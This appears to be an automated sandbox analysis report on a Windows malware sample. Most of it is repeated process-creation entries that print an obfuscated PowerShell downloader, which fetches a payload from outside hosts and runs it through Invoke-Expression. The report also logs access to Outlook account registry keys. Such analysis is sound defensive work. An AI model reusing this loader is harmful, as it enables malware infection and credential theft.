Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: Binary string: m.Core.pdb source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1844677982.0000000002D05000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb>b source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("PowerShell", ""cls;write 'Stumpnser Midernes Fugtighe", "", "", "0");
Source: Yara match File source: 00000005.00000002.1856054813.00000000090AD000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2247528936.0000000003BCD000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Fattigfint)$global:Rudyard = [System.Text.Encoding]::ASCII.GetString($Oratorically)$global:Bestiller=$Rudyard.substring($Spidskandidaternes,$Amphitoky)<#Consultatively Kulminationer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Unpumicated $Inddmningdducible $Tamburmajors), (Muscologist @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Tidslernes222 = [AppDomain]::CurrentDomain.GetA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Cestode)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Uranosphaerite, $false).DefineType($Postboy, $Seq
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Fattigfint)$global:Rudyard = [System.Text.Encoding]::ASCII.GetString($Oratorically)$global:Bestiller=$Rudyard.substring($Spidskandidaternes,$Amphitoky)<#Consultatively Kulminationer
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. 
dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. 
dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. 
dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. 
dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. 
dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. 
dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet 